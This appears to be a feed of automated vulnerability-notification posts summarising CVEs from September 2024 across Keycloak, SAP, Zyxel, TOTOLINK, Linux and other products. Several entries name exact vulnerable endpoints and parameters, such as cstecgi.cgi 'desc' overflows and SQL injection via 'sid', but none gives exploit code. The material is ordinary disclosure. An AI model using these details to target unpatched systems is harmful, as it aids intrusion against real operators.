🚨 CVE-2024-7260An open redirect vulnerability was found in Keycloak. A specially crafted URL can be constructed where the referrer and referrer_uri parameters are made to trick a user to visit a malicious webpage. A trusted URL can trick users and automation into believing that the URL is safe, when, in fact, it redirects to a malicious server. This issue can result in a victim inadvertently trusting the destination of the redirect, potentially leading to a successful phishing attack or other types of attacks.Once a crafted URL is made, it can be sent to a Keycloak admin via email for example. This will trigger this vulnerability when the user visits the page and clicks the link. A malicious actor can use this to target users they know are Keycloak admins for further attacks. It may also be possible to bypass other domain-related security checks, such as supplying this as a OAuth redirect uri. The malicious actor can further obfuscate the redirect_uri using URL encoding, to hide the text of the actual malicious website domain.🎖@cveNotify |
|
| 2024-09-10 12:37:40 |
🚨 CVE-2024-45411Twig is a template language for PHP. Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions. This vulnerability is fixed in 1.44.8, 2.16.1, and 3.14.0.🎖@cveNotify |
|
| 2024-09-10 12:37:36 |
🚨 CVE-2024-42759An issue in Ellevo v.6.2.0.38160 allows a remote attacker to escalate privileges via the /api/usuario/cadastrodesuplente endpoint.🎖@cveNotify |
|
| 2024-09-10 12:37:35 |
🚨 CVE-2024-45751tgt (aka Linux target framework) before 1.0.93 attempts to achieve entropy by calling rand without srand. The PRNG seed is always 1, and thus the sequence of challenges is always identical.🎖@cveNotify |
|
| 2024-09-10 11:37:25 |
🚨 CVE-2024-40754Heap-based Buffer Overflow vulnerability in Samsung Open Source Escargot JavaScript engine allows Overflow Buffers.This issue affects Escargot: 4.0.0.🎖@cveNotify |
|
| 2024-09-10 11:37:24 |
🚨 CVE-2024-45625Cross-site scripting vulnerability exists in Forminator versions prior to 1.34.1. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who follows a crafted URL and accesses the webpage with the web form created by Forminator.🎖@cveNotify |
|
| 2024-09-10 10:37:31 |
🚨 CVE-2022-36362A vulnerability has been identified in LOGO! 12/24RCE (6ED1052-1MD08-0BA1) (All versions), LOGO! 12/24RCE (6ED1052-1MD08-0BA2) (All versions), LOGO! 12/24RCEo (6ED1052-2MD08-0BA1) (All versions), LOGO! 12/24RCEo (6ED1052-2MD08-0BA2) (All versions), LOGO! 230RCE (6ED1052-1FB08-0BA1) (All versions), LOGO! 230RCE (6ED1052-1FB08-0BA2) (All versions), LOGO! 230RCEo (6ED1052-2FB08-0BA1) (All versions), LOGO! 230RCEo (6ED1052-2FB08-0BA2) (All versions), LOGO! 24CE (6ED1052-1CC08-0BA1) (All versions), LOGO! 24CE (6ED1052-1CC08-0BA2) (All versions), LOGO! 24CEo (6ED1052-2CC08-0BA1) (All versions), LOGO! 24CEo (6ED1052-2CC08-0BA2) (All versions), LOGO! 24RCE (6ED1052-1HB08-0BA1) (All versions), LOGO! 24RCE (6ED1052-1HB08-0BA2) (All versions), LOGO! 24RCEo (6ED1052-2HB08-0BA1) (All versions), LOGO! 24RCEo (6ED1052-2HB08-0BA2) (All versions), SIPLUS LOGO! 12/24RCE (All versions), SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA1) (All versions), SIPLUS LOGO! 12/24RCEo (All versions), SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA1) (All versions), SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA1) (All versions), SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA2) (All versions), SIPLUS LOGO! 230RCEo (All versions), SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA1) (All versions), SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA1) (All versions), SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA2) (All versions), SIPLUS LOGO! 24CEo (All versions), SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA1) (All versions), SIPLUS LOGO! 24RCE (All versions), SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA1) (All versions), SIPLUS LOGO! 24RCEo (All versions), SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA1) (All versions). Affected devices do not conduct certain validations when interacting with them. This could allow an unauthenticated remote attacker to manipulate the devices IP address, which means the device would not be reachable and could only be recovered by power cycling the device.🎖@cveNotify |
|
| 2024-09-10 10:37:26 |
🚨 CVE-2020-25236A vulnerability has been identified in LOGO! 12/24RCE (6ED1052-1MD08-0BA1) (All versions), LOGO! 12/24RCEo (6ED1052-2MD08-0BA1) (All versions), LOGO! 230RCE (6ED1052-1FB08-0BA1) (All versions), LOGO! 230RCEo (6ED1052-2FB08-0BA1) (All versions), LOGO! 24CE (6ED1052-1CC08-0BA1) (All versions), LOGO! 24CEo (6ED1052-2CC08-0BA1) (All versions), LOGO! 24RCE (6ED1052-1HB08-0BA1) (All versions), LOGO! 24RCEo (6ED1052-2HB08-0BA1) (All versions), SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA1) (All versions), SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA1) (All versions), SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA1) (All versions), SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA1) (All versions), SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA1) (All versions), SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA1) (All versions), SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA1) (All versions), SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA1) (All versions). The control logic (CL) the LOGO! 8 executes could be manipulated in a way that could cause the deviceexecuting the CL to improperly handle the manipulation and crash. After successful execution of the attack, the device needs to be manually reset.🎖@cveNotify |
|
| 2024-09-10 10:37:25 |
🚨 CVE-2017-2680Specially crafted PROFINET DCP broadcast packets could cause a denial of service condition of affected products on a local Ethernet segment (Layer 2). Human interaction is required to recover the systems. PROFIBUS interfaces are not affected.🎖@cveNotify |
|
| 2024-09-10 09:37:40 |
🚨 CVE-2024-42425Dell Precision Rack, 14G Intel BIOS versions prior to 2.22.2, contains an Access of Memory Location After End of Buffer vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information disclosure.🎖@cveNotify |
|
| 2024-09-10 09:37:33 |
🚨 CVE-2024-39582Dell PowerScale InsightIQ, version 5.0, contain a Use of hard coded Credentials vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Information disclosure.🎖@cveNotify |
|
| 2024-09-10 09:37:32 |
🚨 CVE-2024-39574Dell PowerScale InsightIQ, version 5.1, contain an Improper Privilege Management vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service.🎖@cveNotify |
|
| 2024-09-10 07:37:24 |
🚨 CVE-2024-44072OS command injection vulnerability exists in BUFFALO wireless LAN routers and wireless LAN repeaters. If a user logs in to the management page and sends a specially crafted request to the affected product from the product's specific management page, an arbitrary OS command may be executed.🎖@cveNotify |
|
| 2024-09-10 06:37:25 |
🚨 CVE-2024-7784During internal Axis Security Development Model (ASDM) threat-modelling, a flaw was found in the protection for device tampering (commonly known as Secure Boot) in AXIS OS making it vulnerable to a sophisticated attack to bypass this protection. To Axis' knowledge, there are no known exploits of the vulnerability at this time. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2024-09-10 06:37:24 |
🚨 CVE-2024-6979Amin Aliakbari, member of the AXIS OS Bug Bounty Program, has found a broken access control which would lead to less-privileged operator- and/or viewer accounts having more privileges than designed. The risk of exploitation is very low as it requires complex steps to execute, including knowing of account passwords and social engineering attacks in tricking the administrator to perform specific configurations on operator- and/or viewer-privileged accounts. Axis has released patched AXIS OS a version for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2024-09-10 05:37:32 |
🚨 CVE-2024-44121Under certain conditions Statutory Reports in SAP S/4 HANA allows an attacker with basic privileges to access information which would otherwise be restricted. The vulnerability could expose internal user data that should remain confidential. It does not impact the integrity and availability of the application🎖@cveNotify |
|
| 2024-09-10 05:37:26 |
🚨 CVE-2024-44120SAP NetWeaver Enterprise Portal is vulnerable to reflected cross site scripting due to insufficient encoding of user-controlled input. An unauthenticated attacker could craft a malicious URL and trick a user to click it. If the victim clicks on this crafted URL before it times out, then the attacker could read and manipulate user content in the browser.🎖@cveNotify |
|
| 2024-09-10 05:37:25 |
🚨 CVE-2024-0067Marinus Pfund, member of the AXIS OS Bug Bounty Program, has found the VAPIX API ledlimit.cgi was vulnerable for path traversal attacks allowing to list folder/file names on the local file system of the Axis device. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2024-09-10 05:37:24 |
🚨 CVE-2024-44113Due to missing authorization checks, SAP Business Warehouse (BEx Analyzer) allows an authenticated attacker to access information over the network which is otherwise restricted. On successful exploitation the attacker can enumerate information causing a limited impact on confidentiality of the application.🎖@cveNotify |
|
| 2024-09-10 04:37:26 |
🚨 CVE-2024-44112Due to missing authorization check in SAP for Oil & Gas (Transportation and Distribution), an attacker authenticated as a non-administrative user could call a remote-enabled function which will allow them to delete non-sensitive entries in a user data table. There is no effect on confidentiality or availability.🎖@cveNotify |
|
| 2024-09-10 04:37:25 |
🚨 CVE-2024-41728Due to missing authorization check, SAP NetWeaver Application Server for ABAP and ABAP Platform allows an attacker logged in as a developer to read objects contained in a package. This causes an impact on confidentiality, as this attacker would otherwise not have access to view these objects.🎖@cveNotify |
|
| 2024-09-10 03:37:32 |
🚨 CVE-2024-44114SAP NetWeaver Application Server for ABAP and ABAP Platform allow users with high privileges to execute a program that reveals data over the network. This results in a minimal impact on confidentiality of the application.🎖@cveNotify |
|
| 2024-09-10 03:37:26 |
🚨 CVE-2024-44113Due to missing authorization checks, SAP Business Warehouse (BEx Analyzer) allows an authenticated attacker to access information over the network which is otherwise restricted. On successful exploitation the attacker can enumerate information causing a limited impact on confidentiality of the application.🎖@cveNotify |
|
| 2024-09-10 03:37:25 |
🚨 CVE-2024-42371The RFC enabled function module allows a low privileged user to delete the workplace favourites of any user. This vulnerability could be utilized to identify usernames and access information about targeted user's workplaces and nodes. There is low impact on integrity and availability of the application.🎖@cveNotify |
|
| 2024-09-10 03:37:24 |
🚨 CVE-2024-41729Due to missing authorization checks, SAP BEx Analyzer allows an authenticated attacker to access information over the network which is otherwise restricted. On successful exploitation the attacker can enumerate information causing a limited impact on confidentiality of the application.🎖@cveNotify |
|
| 2024-09-10 02:37:25 |
🚨 CVE-2024-6342**UNSUPPORTED WHEN ASSIGNED** A command injection vulnerability in the export-cgi program of Zyxel NAS326 firmware versions through V5.21(AAZF.18)C0 and NAS542 firmware versions through V5.21(ABAG.15)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.🎖@cveNotify |
|
| 2024-09-10 02:37:24 |
🚨 CVE-2024-38270An insufficient entropy vulnerability caused by the improper use of a randomness function with low entropy for web authentication tokens generation exists in the Zyxel GS1900-10HP firmware version V2.80(AAZI.0)C0. This vulnerability could allow a LAN-based attacker a slight chance to gain a valid session token if multiple authenticated sessions are alive.🎖@cveNotify |
|
| 2024-09-10 01:07:36 |
🚨 CVE-2024-40766An improper access control vulnerability has been identified in the SonicWall SonicOS management access, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash. This issue affects SonicWall Firewall Gen 5 and Gen 6 devices, as well as Gen 7 devices running SonicOS 7.0.1-5035 and older versions.🎖@cveNotify |
|
| 2024-09-10 01:07:35 |
🚨 CVE-2016-3714The (1) EPHEMERAL, (2) HTTPS, (3) MVG, (4) MSL, (5) TEXT, (6) SHOW, (7) WIN, and (8) PLT coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka "ImageTragick."🎖@cveNotify |
|
| 2024-09-09 23:37:25 |
🚨 CVE-2024-7885A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.🎖@cveNotify |
|
| 2024-09-09 23:37:24 |
🚨 CVE-2024-5971A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected 0\r\n termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.🎖@cveNotify |
|
| 2024-09-09 21:37:37 |
🚨 CVE-2024-44844DrayTek Vigor3900 v1.5.1.6 was discovered to contain an authenticated command injection vulnerability via the name parameter in the run_command function.🎖@cveNotify |
|
| 2024-09-09 21:37:31 |
🚨 CVE-2024-8105A vulnerability related to the use an insecure Platform Key (PK) has been discovered. An attacker with the compromised PK private key can create malicious UEFI software that is signed with a trusted key that has been compromised.🎖@cveNotify |
|
| 2024-09-09 21:37:30 |
🚨 CVE-2023-49001An issue in Indi Browser (aka kvbrowser) v.12.11.23 allows an attacker to bypass intended access restrictions via interaction with the com.example.gurry.kvbrowswer.webview component.🎖@cveNotify |
|
| 2024-09-09 21:37:29 |
🚨 CVE-2023-51034TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi UploadFirmwareFile interface.🎖@cveNotify |
|
| 2024-09-09 21:37:26 |
🚨 CVE-2023-46502An issue in openCRX v.5.2.2 allows a remote attacker to read internal files and execute server side request forgery attack via insecure DocumentBuilderFactory.🎖@cveNotify |
|
| 2024-09-09 21:37:25 |
🚨 CVE-2023-46867In International Color Consortium DemoIccMAX 79ecb74, CIccXformMatrixTRC::GetCurve in IccCmm.cpp in libSampleICC.a has a NULL pointer dereference.🎖@cveNotify |
|
| 2024-09-09 21:37:24 |
🚨 CVE-2023-46866In International Color Consortium DemoIccMAX 79ecb74, CIccCLUT::Interp3d in IccProfLib/IccTagLut.cpp in libSampleICC.a attempts to access array elements at out-of-bounds indexes.🎖@cveNotify |
|
| 2024-09-09 20:37:32 |
🚨 CVE-2020-36767tinyfiledialogs (aka tiny file dialogs) before 3.8.0 allows shell metacharacters in titles, messages, and other input data.🎖@cveNotify |
|
| 2024-09-09 20:37:26 |
🚨 CVE-2023-46570An out-of-bounds read in radare2 v.5.8.9 and before exists in the print_insn32 function of libr/arch/p/nds32/nds32-dis.h.🎖@cveNotify |
|
| 2024-09-09 20:37:25 |
🚨 CVE-2023-40140In android_view_InputDevice_create of android_view_InputDevice.cpp, there is a possible way to execute arbitrary code due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-09 20:37:24 |
🚨 CVE-2023-40130In onBindingDied of CallRedirectionProcessor.java, there is a possible permission bypass due to a logic error in the code. This could lead to local escalation of privilege and background activity launch with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-09 19:37:33 |
🚨 CVE-2023-30583fs.openAsBlob() can bypass the experimental permission model when using the file system read restriction with the `--allow-fs-read` flag in Node.js 20. This flaw arises from a missing check in the `fs.openAsBlob()` API.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2024-09-09 19:37:26 |
🚨 CVE-2023-30582A vulnerability has been identified in Node.js version 20, affecting users of the experimental permission model when the --allow-fs-read flag is used with a non-* argument. This flaw arises from an inadequate permission model that fails to restrict file watching through the fs.watchFile API. As a result, malicious actors can monitor files that they do not have explicit read access to.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2024-09-09 19:37:25 |
🚨 CVE-2024-5967A vulnerability was found in Keycloak. The LDAP testing endpoint allows changing the Connection URL independently without re-entering the currently configured LDAP bind credentials. This flaw allows an attacker with admin access (permission manage-realm) to change the LDAP host URL ("Connection URL") to a machine they control. The Keycloak server will connect to the attacker's host and try to authenticate with the configured credentials, thus leaking them to the attacker. As a consequence, an attacker who has compromised the admin console or compromised a user with sufficient privileges can leak domain credentials and attack the domain.🎖@cveNotify |
|
| 2024-09-09 19:37:24 |
🚨 CVE-2023-51092Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function upgrade.🎖@cveNotify |
|
| 2024-09-09 19:07:32 |
🚨 CVE-2024-8577A vulnerability was found in TOTOLINK AC1200 T8 and AC1200 T10 4.1.5cu.861_B20230220/4.1.8cu.5207. It has been declared as critical. Affected by this vulnerability is the function setStaticDhcpRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument desc leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-09 19:07:26 |
🚨 CVE-2024-8576A vulnerability was found in TOTOLINK AC1200 T8 and AC1200 T10 4.1.5cu.861_B20230220/4.1.8cu.5207. It has been classified as critical. Affected is the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument desc leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-09 19:07:25 |
🚨 CVE-2024-8573A vulnerability, which was classified as critical, was found in TOTOLINK AC1200 T8 and AC1200 T10 4.1.5cu.861_B20230220/4.1.8cu.5207. This affects the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument desc leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-09 19:07:24 |
🚨 CVE-2024-2541The Popup Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the Subscribers Import feature. This makes it possible for unauthenticated attackers to extract sensitive data after an administrator has imported subscribers via a CSV file. This data may include the first name, last name, e-mail address, and potentially other personally identifiable information of subscribers.🎖@cveNotify |
|
| 2024-09-09 18:37:32 |
🚨 CVE-2024-6162A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processed. As a result, the server may attempt to access the wrong path, causing errors such as "404 Not Found" or other application failures. This flaw can potentially lead to a denial of service, as legitimate resources become inaccessible due to the path mix-up.🎖@cveNotify |
|
| 2024-09-09 18:37:26 |
🚨 CVE-2023-7216A path traversal vulnerability was found in the CPIO utility. This issue could allow a remote unauthenticated attacker to trick a user into opening a specially crafted archive. During the extraction process, the archiver could follow symlinks outside of the intended directory, which allows files to be written in arbitrary directories through symlinks.🎖@cveNotify |
|
| 2024-09-09 18:37:25 |
🚨 CVE-2023-52286Tencent tdsqlpcloud through 1.8.5 allows unauthenticated remote attackers to discover database credentials via an index.php/api/install/get_db_info request, a related issue to CVE-2023-42387.🎖@cveNotify |
|
| 2024-09-09 18:37:24 |
🚨 CVE-2023-51429Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak.🎖@cveNotify |
|
| 2024-09-09 18:07:35 |
🚨 CVE-2024-40969In the Linux kernel, the following vulnerability has been resolved:f2fs: don't set RO when shutting down f2fsShutdown does not check the error of thaw_super due to readonly, whichcauses a deadlock like below.f2fs_ioc_shutdown(F2FS_GOING_DOWN_FULLSYNC) issue_discard_thread - bdev_freeze - freeze_super - f2fs_stop_checkpoint() - f2fs_handle_critical_error - sb_start_write - set RO - waiting - bdev_thaw - thaw_super_locked - return -EINVAL, if sb_rdonly() - f2fs_stop_discard_thread -> wait for kthread_stop(discard_thread);🎖@cveNotify |
|
| 2024-09-09 18:07:34 |
🚨 CVE-2024-40964In the Linux kernel, the following vulnerability has been resolved:ALSA: hda: cs35l41: Possible null pointer dereference in cs35l41_hda_unbind()The cs35l41_hda_unbind() function clears the hda_component entrymatching it's index and then dereferences the codec pointer held in thefirst element of the hda_component array, this is an issue when thedevice index was 0.Instead use the codec pointer stashed in the cs35l41_hda structure as itwill still be valid.🎖@cveNotify |
|
| 2024-09-09 18:07:33 |
🚨 CVE-2024-39498In the Linux kernel, the following vulnerability has been resolved:drm/mst: Fix NULL pointer dereference at drm_dp_add_payload_part2[Why]Commit:- commit 5aa1dfcdf0a4 ("drm/mst: Refactor the flow for payload allocation/removement")accidently overwrite the commit- commit 54d217406afe ("drm: use mgr->dev in drm_dbg_kms in drm_dp_add_payload_part2")which cause regression.[How]Recover the original NULL fix and remove the unnecessary input parameter 'state' fordrm_dp_add_payload_part2().(cherry picked from commit 4545614c1d8da603e57b60dd66224d81b6ffc305)🎖@cveNotify |
|
| 2024-09-09 17:37:37 |
🚨 CVE-2024-45406Craft is a content management system (CMS). Craft CMS 5 stored XSS can be triggered by the breadcrumb list and title fields with user input.🎖@cveNotify |
|
| 2024-09-09 17:37:36 |
🚨 CVE-2024-44720SeaCMS v13.1 was discovered to an arbitrary file read vulnerability via the component admin_safe.php.🎖@cveNotify |
|
| 2024-09-09 17:37:35 |
🚨 CVE-2024-42019A vulnerability that allows an attacker to access the NTLM hash of the Veeam Reporter Service service account. This attack requires user interaction and data collected from Veeam Backup & Replication.🎖@cveNotify |
|
| 2024-09-09 17:37:32 |
🚨 CVE-2024-39714A code injection vulnerability that permits a low-privileged user to upload arbitrary files to the server, leading to remote code execution on VSPC server.🎖@cveNotify |
|
| 2024-09-09 17:37:31 |
🚨 CVE-2024-21524All versions of the package node-stringbuilder are vulnerable to Out-of-bounds Read due to incorrect memory length calculation, by calling ToBuffer, ToString, or CharAt on a StringBuilder object with a non-empty string value input. It's possible to return previously allocated memory, for example, by providing negative indexes, leading to an Information Disclosure.🎖@cveNotify |
|
| 2024-09-09 17:37:30 |
🚨 CVE-2024-6279A vulnerability was found in lahirudanushka School Management System 1.0.0/1.0.1 and classified as critical. Affected by this issue is some unknown functionality of the file examresults-par.php of the component Exam Results Page. The manipulation of the argument sid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269492.🎖@cveNotify |
|
| 2024-09-09 17:37:27 |
🚨 CVE-2024-6278A vulnerability has been found in lahirudanushka School Management System 1.0.0/1.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file subject.php of the component Subject Page. The manipulation of the argument update leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269491.🎖@cveNotify |
|
| 2024-09-09 17:37:26 |
🚨 CVE-2024-6276A vulnerability, which was classified as critical, has been found in lahirudanushka School Management System 1.0.0/1.0.1. This issue affects some unknown processing of the file teacher.php of the component Teacher Page. The manipulation of the argument update leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269489 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-09-09 17:37:25 |
🚨 CVE-2024-6275A vulnerability classified as critical was found in lahirudanushka School Management System 1.0.0/1.0.1. This vulnerability affects unknown code of the file parent.php of the component Parent Page. The manipulation of the argument update leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269488.🎖@cveNotify |
|
| 2024-09-09 17:37:24 |
🚨 CVE-2018-1546IBM API Connect 5.0.0.0 through 5.0.8.3 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 142650.🎖@cveNotify |
|
| 2024-09-09 17:07:25 |
🚨 CVE-2024-33509An improper certificate validation vulnerability [CWE-295] in FortiWeb 7.2.0 through 7.2.1, 7.0 all versions, 6.4 all versions and 6.3 all versions may allow a remote and unauthenticated attacker in a Man-in-the-Middle position to decipher and/or tamper with the communication channel between the device and different endpoints used to fetch data for Web Application Firewall (WAF).🎖@cveNotify |
|
| 2024-09-09 16:37:36 |
🚨 CVE-2024-40711A deserialization of untrusted data vulnerability with a malicious payload can allow an unauthenticated remote code execution (RCE).🎖@cveNotify |
|
| 2024-09-09 16:37:32 |
🚨 CVE-2024-39715A code injection vulnerability that allows a low-privileged user with REST API access granted to remotely upload arbitrary files to the VSPC server using REST API, leading to remote code execution on VSPC server.🎖@cveNotify |
|
| 2024-09-09 16:37:31 |
🚨 CVE-2024-27784Multiple Exposure of sensitive information to an unauthorized actor vulnerabilities [CWE-200] in FortiAIOps version 2.0.0 may allow an authenticated, remote attacker to retrieve sensitive information from the API endpoint or log files.🎖@cveNotify |
|
| 2024-09-09 16:37:30 |
🚨 CVE-2024-26015An incorrect parsing of numbers with different radices vulnerability [CWE-1389] in FortiProxy version 7.4.3 and below, version 7.2.10 and below, version 7.0.17 and below and FortiOS version 7.4.3 and below, version 7.2.8 and below, version 7.0.15 and below IP address validation feature may permit an unauthenticated attacker to bypass the IP blocklist via crafted requests.🎖@cveNotify |
|
| 2024-09-09 16:37:27 |
🚨 CVE-2024-6274A vulnerability classified as critical has been found in lahirudanushka School Management System 1.0.0/1.0.1. This affects an unknown part of the file /attendancelist.php of the component Attendance Report Page. The manipulation of the argument aid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269487.🎖@cveNotify |
|
| 2024-09-09 16:37:26 |
🚨 CVE-2024-2911A vulnerability, which was classified as problematic, was found in Tianjin PubliCMS 4.0.202302.e. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-09 16:37:25 |
🚨 CVE-2023-5623NNM failed to properly set ACLs on its installation directory, which could allow a low privileged user to run arbitrary code with SYSTEM privileges where NNM is installed to a non-standard location🎖@cveNotify |
|
| 2024-09-09 16:07:30 |
🚨 CVE-2024-23663An improper access control in Fortinet FortiExtender 4.1.1 - 4.1.9, 4.2.0 - 4.2.6, 5.3.2, 7.0.0 - 7.0.4, 7.2.0 - 7.2.4 and 7.4.0 - 7.4.2 allows an attacker to create users with elevated privileges via a crafted HTTP request.🎖@cveNotify |
|
| 2024-09-09 16:07:26 |
🚨 CVE-2023-50181An improper access control vulnerability [CWE-284] in Fortinet FortiADC version 7.4.0 through 7.4.1 and before 7.2.4 allows a read only authenticated attacker to perform some write actions via crafted HTTP or HTTPS requests.🎖@cveNotify |
|
| 2024-09-09 16:07:25 |
🚨 CVE-2024-37175SAP CRM WebClient does notperform necessary authorization check for an authenticated user, resulting inescalation of privileges. This could allow an attacker to access some sensitiveinformation.🎖@cveNotify |
|
| 2024-09-09 16:07:24 |
🚨 CVE-2024-37172SAP S/4HANA Finance (Advanced PaymentManagement) does not perform necessary authorization check for an authenticateduser, resulting in escalation of privileges. As a result, it has a low impactto confidentiality and availability but there is no impact on the integrity.🎖@cveNotify |
|
| 2024-09-09 15:37:39 |
🚨 CVE-2024-37171SAP Transportation Management (CollaborationPortal) allows an attacker with non-administrative privileges to send a craftedrequest from a vulnerable web application. This will trigger the applicationhandler to send a request to an unintended service, which may revealinformation about that service. The information obtained could be used totarget internal systems behind firewalls that are normally inaccessible to anattacker from the external network, resulting in a Server-Side Request Forgeryvulnerability. There is no effect on integrity or availability of theapplication.🎖@cveNotify |
|
| 2024-09-09 15:37:35 |
🚨 CVE-2024-34692Due to missing verification of file type orcontent, SAP Enable Now allows an authenticated attacker to upload arbitraryfiles. These files include executables which might be downloaded and executedby the user which could host malware. On successful exploitation an attackercan cause limited impact on confidentiality and Integrity of the application.🎖@cveNotify |
|
| 2024-09-09 15:37:34 |
🚨 CVE-2021-33635When malicious images are pulled by isula pull, attackers can execute arbitrary code.🎖@cveNotify |
|
| 2024-09-09 15:37:33 |
🚨 CVE-2016-3714The (1) EPHEMERAL, (2) HTTPS, (3) MVG, (4) MSL, (5) TEXT, (6) SHOW, (7) WIN, and (8) PLT coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka "ImageTragick."🎖@cveNotify |
|
| 2024-09-09 14:37:57 |
🚨 CVE-2024-6910The EventON WordPress plugin before 2.2.17 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.🎖@cveNotify |
|
| 2024-09-09 14:37:52 |
🚨 CVE-2024-42023An improper access control vulnerability allows low-privileged users to execute code with Administrator privileges remotely.🎖@cveNotify |
|
| 2024-09-09 14:37:51 |
🚨 CVE-2024-40714An improper certificate validation vulnerability in TLS certificate validation allows an attacker on the same network to intercept sensitive credentials during restore operations.🎖@cveNotify |
|
| 2024-09-09 14:37:47 |
🚨 CVE-2024-45034Apache Airflow versions before 2.10.1 have a vulnerability that allows DAG authors to add local settings to the DAG folder and get it executed by the scheduler, where the scheduler is not supposed to execute code submitted by the DAG author. Users are advised to upgrade to version 2.10.1 or later, which has fixed the vulnerability.🎖@cveNotify |
|
| 2024-09-09 14:37:46 |
🚨 CVE-2024-34158Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.🎖@cveNotify |
|
| 2024-09-09 14:37:45 |
🚨 CVE-2024-38998jrburke requirejs v2.3.6 was discovered to contain a prototype pollution via the function config. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-09-09 14:07:44 |
🚨 CVE-2024-34142Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-09-09 14:07:43 |
